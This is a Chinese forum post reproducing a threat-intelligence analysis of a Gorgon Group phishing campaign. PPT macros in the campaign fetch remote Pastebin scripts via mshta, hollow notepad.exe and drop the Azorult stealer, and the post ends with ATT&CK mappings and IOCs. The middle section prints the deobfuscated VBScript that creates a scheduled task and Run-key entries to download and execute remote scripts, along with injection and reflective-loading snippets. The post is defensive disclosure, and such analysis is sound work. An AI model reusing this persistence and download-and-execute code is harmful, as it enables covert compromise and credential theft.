首页
社区
课程
招聘
[原创]收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件
发表于: 2020-4-27 23:53 2629

[原创]收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件

2020-4-27 23:53
2629

一、背景

近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码,宏代码会启动mshta执行保存在pastebin上的远程脚本代码,且pastebin URL是由Bitly生成的短链接。

 

此次攻击的主要特点为恶意代码保存在托管平台pastebin上:包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马,然后将其注入指定进程执行,RAT会不定期更换,当前获取的RAT 木马是Azorult窃密木马。


对比分析发现,攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月),与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似,因此我们认为两者属于同一家族ManaBotnet,并且”lunlayloo”可能为“hagga”的后继者。

 

有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group,一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击,包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。

Manabotnet攻击流程


二、详细分析

初始攻击以PPT文档为诱饵,使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”,邮件主题为Analysis Reports From IDS Group(来自IDS Group的分析报告 )、Analysis Reports From NHL - Nam Hoang Long Co.,Ltd(来自NHL公司的分析报告)、Purchase Order2020(2020采购订单)、payment_receipt.ppt(付款收据)等。

 

Analysis Reports.ppt中包含恶意的VBA宏代码。

 

 

如果用户选择启用宏,则会执行命令:mshta https[:]//j.mp/ghostis61hazsba,远程代码URL是短链接,还原为https[:]//pastebin.com/raw/FssQ8e8e,恶意代码被保存在托管平台pastebin.com。

 

以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为,https[:]//j.mp/ghjbnzmxc767zxg,短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd,该地址的托管恶意代码页面如下:

 

通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码:

 

该代码加入了一些字符反转和字符连接操作,以逃避恶意代码检测,然后执行5个操作进行持久化:

 

1. 创建计划任务“Murtaba”,每80分钟运行一次远程hta脚本

2. 执行一次hta脚本

3. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令

4. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令

5. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令


CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Murtaba"" /tr ""\""'mshta\""http:\\pastebin.com\raw\B7f3BpDk"" /F ",0

CreateObject("WScript.Shell").Run """mshta""""http:\\pastebin.com\raw\B7f3BpDk"""


CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\eMse7spS""", "REG_SZ"


CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\hxKddkar""", "REG_SZ"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\v2US1QAY""", "REG_SZ"

 

在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk,解码为以下文本,同样是一段VBScript代码,在其中以隐藏的方式执行Powershell,首先通过ping google.com测试网络是否连通,然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。

 

计划任务执行的Pastebin保存的VBScript脚本:

 

VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本:

 

Base64解码后:

 

Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存,使用时首先将“!”替换为“0x”去除混淆,然后通过IO.MemoryStream将数据读取到内存,最后再使用IO.Compression.GzipStream进行解压,就可以获得一个以.Net编写的DLL并通过Reflection  加载执行:

 

$t=[System.Reflection.Assembly]::Load($decompressedByteArray);

 

Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL(https://pastebin.com/raw/f9c50ewQ)上,使用时首先将‘T_B’替换为‘0x’,在分析过程中发URL被动态更换为了:https://pastebin.com/raw/EmyvkN6m,使用时将“^^_^^”替换为“0x”,还原得到PE文件后,将其注入到notepad.exe的内存中执行:

[Givara]::FreeDom(‘notepad.exe’,$Cli2)

 

https[:]//pastebin.com/raw/f9c50ewQ

 

https[:]//pastebin.com/raw/EmyvkN6m

 

.NET编写的DLL名为Apple.dll,入口调用Fuck.FUN,Fuck.FUN随后启动记事本,掏空现有部分的映射,在记事本进程中分配一个新的缓冲区,向该进程中写入有效负载,然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘,通过计划任务可定期获取注射器(一段攻击代码,用来将RAT注入其他程序)和RAT,并将RAT注入指定进程的内存中执行。

 

当前作为Payload被下载执行的是Azorult木马,一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售,价格最高为100美元。

 

Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码,例如,电子邮件帐户,通信软件(例如pidgin、 psi+,、telegram),Web Cookie,浏览器历史记录和加密货币钱包,同时该木马还具有上载和下载文件以及截屏的功能。


三、团伙分析

攻击者使用第三方网站(例如Bitly,Blogspot和Pastebin)可能是为了逃避检测,因为这些网站不会被网络防御方判断为恶意网站。但是,诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子,并统计该链接被访问了多少次。

 

例如,从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是,由于攻击者使用的是已知的RAT木马,因此实际受影响的计算机数量可能会少得多,因为许多计算机可能已安装了杀毒软件。

 

“lunlayloo”在2020年3月30日上传的恶意代码,该账户创建于2019年10月23日。

 

lunlayloo在2020年4月21日上传的恶意代码,托管“Azorult Rat”,由于最近才更新,被查看只有77次。

 

分析时发现攻击Azorult Rat回传数据对应的URL为:

http[:]//23.247.102.120/manabotnet-work/index.php

 

该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题:“ MasterManabots-all-bots”相同,该攻击者的Pastebin账号名称为“hagga”,于2018年12月3日创建,另外由于两次攻击使用的TTP高度相似性,所以我们认为他们属于同一家族ManaBots。

 

unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析,基于高水平的TTP,包括使用RevengeRAT,unit42认为其与Gorgon Group组织有关。

(https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/)

 

2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击,)(https[:]//www.freebuf.com/column/193603.html),该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击,行为类似于腾讯安全威胁情报中心多次披露的”商贸信”,攻击者使用blogspot的订阅功能来保存恶意代码。

 

综合分析以上几次攻击行动,总结该团伙攻击对应的ATT&CK矩阵对应如下,共涉及约44个TTP技术:

Initial Access(初始攻击)

T1193 Spearphishing Attachment


Execution(执行)

T1106 Execution through API

T1129 Execution through Module Load

T1203 Exploitation for Client Execution

T1170 Mshta

T1086 PowerShell

T1053 Scheduled Task

T1064 Scripting

T1127 Trusted Developer Utilities


Persistence(持久化)

T1060 Registry Run Keys / Startup Folder

T1053 Scheduled Task


Privilege Escalation(权限提升)

T1055 Process Injection

T1053 Scheduled Task


Defense Evasion(防御逃逸)

T1140 Deobfuscate/Decode Files or Information

T1143 Hidden Window

T1170 Mshta

T1027 Obfuscated Files or Information

T1093 Process Hollowing

T1055 Process Injection

T1064 Scripting

T1127 Trusted Developer Utilities

T1102 Web Service


Credential Access(凭证获取)

T1503 Credentials from Web Browsers

T1081 Credentials in Files

T1214 Credentials in Registry

T1539 Steal Web Session Cookie


Discovery(数据发现)

T1083 File and Directory Discovery

T1012 Query Registry

T1518 Software Discovery

T1082 System Information Discovery

T1007 System Service Discovery


Collection(数据采集)

T1123 Audio Capture

T1119 Automated Collection

T1115 Clipboard Data

T1213 Data from Information Repositories

T1005 Data from Local System

T1039 Data from Network Shared Drive

T1074 Data Staged

T1056 Input Capture

T1185 Man in the Browser

T1113 Screen Capture

T1125 Video Capture


Command and Control(命令和控制)

T1094 Custom Command and Control Protocol

T1024 Custom Cryptographic Protocol

T1132 Data Encoding

T1001 Data Obfuscation

T1219 Remote Access Tools

T1105 Remote File Copy

T1102 Web Service


Exfiltration(数据窃取)

T1022 Data Encrypted

T1041 Exfiltration Over Command and Control Channel


 

其中具有该团伙的代表性的TTP技术点为:


在T1102 Web Service技术上,该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin,这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion(防御逃逸)和Command and Control(命令和控制),在具体攻击过程中体现在可以绕过恶意网址检测,以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。


四、安全建议

Gorgon Group为专业黑客组织,擅长攻击大型企业、行业及政府背景的机构,腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性,防止专业黑客的攻击。 

腾讯安全解决方案部署示意图

 

 

腾讯安全产品针对Gorgon Group黑产团伙的解决方案清单

 

 

 

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

 

IOCs

Md5

417eef85b7545b13cb2a5b09508a9b8a

cd425ac433c6fa5b79eecbdd385740ab

f4479c5553271402ab4ff9a55584a9fd

 

URL

http[:]//23.247.102.120/manabotnet-work/index.php

 

短链接:

https[:]//j.mp/ghjbnzmxc767zxg

https[:]//j.mp/hdjas6782vnavx

https[:]//j.mp/dhajsk67a8sdg

https[:]//j.mp/ahjkads78dasa

https[:]//j.mp/hdajks6786sa

https[:]//j.mp/dbashgdyt23vb

 

Pastebin

https[:]//pastebin.com/raw/8ZebE1MG

https[:]//pastebin.com/raw/FssQ8e8e

https[:]//pastebin.com/raw/RCd2CLNd

https[:]//pastebin.com/raw/f9c50ewQ

https[:]//pastebin.com/raw/EmyvkN6m

https[:]//pastebin.com/raw/B7f3BpDk

https[:]//pastebin.com/raw/eMse7spS

https[:]//pastebin.com/raw/hxKddkar

https[:]//pastebin.com/raw/v2US1QAY

 

参考链接:

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://www.freebuf.com/column/193603.html

 



[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 3496
活跃值: (749)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
谢谢分享,就是图片也太模糊了,一点也看不清楚,是不是要换个截图工具
2020-4-28 05:13
0
游客
登录 | 注册 方可回帖
返回
//